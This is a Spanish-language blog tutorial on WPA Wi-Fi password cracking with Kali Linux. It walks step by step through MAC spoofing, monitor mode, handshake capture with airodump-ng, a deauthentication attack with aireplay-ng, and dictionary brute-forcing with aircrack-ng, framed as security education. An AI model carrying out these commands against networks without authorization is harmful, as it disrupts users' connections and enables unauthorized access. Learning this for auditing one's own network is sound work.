Wifi WPA Pentesting/Hacking – Básico – KaliLinux

El motivo de este post es compartir información de una técnica básica de hacking para todo aquel que este incursionado en seguridad informática. Cabe destacar que el post no tiene la finalidad de incentivar el cyber crimen pero si la de compartir conocimiento y educar en seguridad informática, para saber como son ejecutados y conocer la vulnerabilidad de nuestra red. Un consejo básico es elegir calves mas complejas que incluyan como mínimo mayúsculas, minúsculas y números y encapsulación WPA2. Este pentesting usaremos las herramientas aircrack y airdump sobre la distribución de linux llamada Kali, la cual ofrece una gran variedad de herramientas de auditoría de seguridad.
Configuraremos nuestra conexión wireless en modo monitor, escanearemos los puntos de acceso wifi cercanos, seleccionaremos un objetivo, empezaremos a capturar paquetes con airodump, seguido haremos un ataque de desautenticación y luego sobre el archivo de los paquetes capturados ultilizaremos un diccionario y fuerza bruta para encontrar la contraseña wifi.
Los ataques por fuerza bruta no son ataque %100 eficaces ya que dependemos de uno o varios diccionarios, poder de procesamiento, se requiere mucho tiempo y paciencia, ya que el pc durante varias horas probara infinidad de combinaciones posibles. Existe una gran posibilidad que no exista en nuestros diccionarios una combinación igual a la clave a descifrar.

Documentación adicional
https://www.aircrack-ng.org/
https://www.aircrack-ng.org/doku.php?id=es:aireplay-ng

 

Configuramos nuestra conexión wireless

Indentificar la placa wireless

ificonfig 

Apagamos nuestra placa wifi

ifconfig wlan0 down

Cambiamos nuestra mac address

macchanger -r wlan0


Activamos modo monitor en nuestra placa wireless

iwconfig wlan0 mode monitor

Levantamos nuestra placa wireless

ifconfig wlan0 up

PenTesting

Ahora usaremos la herramienta Airdump y scaneamos las redes wifi en nuestro entorno

airodump-ng wlan0

En un nuevo terminal vamos a puntar nuestro ataque a un punto de acceso elegido para hacer nuestro pentesting

airodump-ng -c 7  -w ssidwifi –bssid  mac-wifi-a-testear  wlan0

Significado de los flags:
-c es el canal del punto de acceso al cual vamos a realizar el pentesting
 -w es el nombre del archivo donde se va a guardar los paquetes capturados
–bssid mac addess del punto de acceso a realizar el pentesting

Realizamos un ataque de desautenticación a los dipositivos que se encuentran conectados al punto de acceso wifi al cual estamos haciendo el pentesting.

Usaremos la herramienta aireplay
-a mac address del router del access point (BSSID)
-c mac address del cliente conectado al punto de acceso

aireplay-ng –deauth 10 -a macrouter -c maccliente

Ahora usaremos la herramienta aircrack, este por un sistema de fuerza bruta descifraza la contraseña que esta en el archivo que definimos en la etapa de captura de paquetes
-w ruta de nuestro wordlist

aircrack-ng -w /worlist/route  /route/file.cap

 

Deja una respuesta